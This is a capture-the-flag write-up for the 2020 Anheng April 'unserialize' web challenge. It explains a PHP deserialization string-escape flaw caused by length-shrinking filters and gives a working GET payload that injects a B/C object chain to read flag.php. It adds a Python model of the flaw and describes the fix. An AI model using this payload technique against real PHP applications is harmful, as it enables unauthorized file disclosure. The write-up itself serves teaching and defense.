2020 Anheng (安恒) April Challenge - Web - unserialize

View the source:

<?php
// The opening of the file (from the <?php tag through "$this->") was lost when the
// page was scraped; class A is reconstructed from the surviving constructor body.
class A{
    public $username;
    public $password;
    function __construct($a, $b){
        $this->username = $a;
        $this->password = $b;
    }
}

class B{
    public $b = 'gqy';
    function __destruct(){
        // string concatenation: if $this->b is an object, its __toString() runs
        $c = 'a'.$this->b;
        echo $c;
    }
}

class C{
    public $c;
    function __toString(){
        //flag.php
        echo file_get_contents($this->c);
        return 'nice';
    }
}

// write() and read() are the storage filters shown further down
$a = new A($_GET['a'],$_GET['b']);
echo read(write(serialize($a)));
// the step that stores the serialized data is omitted; below it is fetched and unserialized
$b = unserialize(read(write(serialize($a))));
echo '<br>'.$b->password;
?>
A first guess is a format-string style vulnerability.

There is a small problem here:

function write($data) {
    // 3 bytes (NUL, '*', NUL) become the 6-byte literal \0\0\0
    return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data);
}

function read($data) {
    // the 6-byte literal \0\0\0 becomes 3 bytes (NUL, '*', NUL)
    return str_replace('\0\0\0', chr(0) . '*' . chr(0), $data);
}

When read() converts `\0\0\0` (six bytes) back to `chr(0).'*'.chr(0)` (three bytes), the data gets shorter but the `s:N:` length prefixes that serialize() wrote are unchanged, so unserialize() reads past the end of the real string content: a deserialization string escape.

See here for details.

After discussing it with teammates, we built the following payload:

a=\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0&b=c";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}
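The mechanism behind this payload, as an added example that is not part of the original write-up: a Python model of the challenge's write()/read() filters and of the way unserialize() trusts an `s:N:` length prefix. Only the two filters and the payload come from the page; the shape of the serialized A object, the `take_php_string` helper and the `filter_preserves_length` check are assumptions made for this illustration.

```python
"""Added example (not from the original write-up): model the write()/read()
filters and show why the declared s:N: length lets the payload escape."""
import re

def php_write(data: str) -> str:
    # PHP: str_replace(chr(0).'*'.chr(0), '\0\0\0', $data): 3 bytes become 6
    return data.replace("\x00*\x00", r"\0\0\0")

def php_read(data: str) -> str:
    # PHP: str_replace('\0\0\0', chr(0).'*'.chr(0), $data): 6 bytes become 3
    return data.replace(r"\0\0\0", "\x00*\x00")

def serialize_a(username: str, password: str) -> str:
    # Assumed shape of serialize(new A($a, $b)) for two public properties;
    # each s:N: prefix is a byte count written at serialization time.
    return ('O:1:"A":2:{s:8:"username";s:%d:"%s";s:8:"password";s:%d:"%s";}'
            % (len(username.encode()), username, len(password.encode()), password))

_STR_HEADER = re.compile(r's:(\d+):"')

def take_php_string(data: str, pos: int):
    """Read one s:N:"...": token the way unserialize() does: trust N and
    consume exactly N bytes, whatever they are. Returns (value, next position)."""
    m = _STR_HEADER.match(data, pos)
    if m is None:
        raise ValueError("expected s:N: at offset %d" % pos)
    n = int(m.group(1))
    start = m.end()
    value = data[start:start + n]
    if data[start + n:start + n + 2] != '";':
        raise ValueError("string of declared length %d is not terminated" % n)
    return value, start + n + 2

# The GET parameters from the write-up: a = 24 x "\0" (48 bytes), b = injected tail
USERNAME = r"\0" * 24
PASSWORD = 'c";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}'

def filter_preserves_length(serialized: str) -> bool:
    """Defender check: a filter applied to serialized data must be length-neutral,
    otherwise every s:N: prefix after the first replacement is wrong."""
    return len(php_read(php_write(serialized))) == len(serialized)

def demo(username: str = USERNAME, password: str = PASSWORD) -> dict:
    stored = php_write(serialize_a(username, password))   # what gets written
    loaded = php_read(stored)                              # what unserialize() sees
    pos = loaded.index("{") + 1                            # skip O:1:"A":2:{
    key1, pos = take_php_string(loaded, pos)               # "username"
    val1, pos = take_php_string(loaded, pos)               # declared 48, real content 24
    key2, pos = take_php_string(loaded, pos)               # the *injected* "password"
    return {
        "shrink": len(stored) - len(loaded),               # bytes lost to read()
        "username": val1,                                  # real content + swallowed text
        "second_key": key2,
        "second_value_starts": loaded[pos:pos + 11],       # now an object, not a string
        "length_neutral": filter_preserves_length(serialize_a(username, password)),
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(key, repr(value))
```

The 24 `\0` in `a` are 48 bytes when serialized, so serialize() writes `s:48:`; read() turns each `\0\0\0` into three bytes, leaving 24 bytes of real content, and unserialize() fills the remaining 24 bytes of the declared length with `";s:8:"password";s:72:"c` (the original `password` header and the leading `c` of `b`). Parsing then resumes inside the attacker-controlled value, where `password` is an object B whose `b` is an object C with `c = "flag.php"`; when B is destroyed, `'a'.$this->b` invokes C::__toString(), which echoes flag.php. The `filter_preserves_length` check captures the root cause: the fix is never to apply byte-changing replacements to already-serialized data (filter the fields before serialize(), or authenticate stored blobs with an HMAC so they cannot be reinterpreted).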
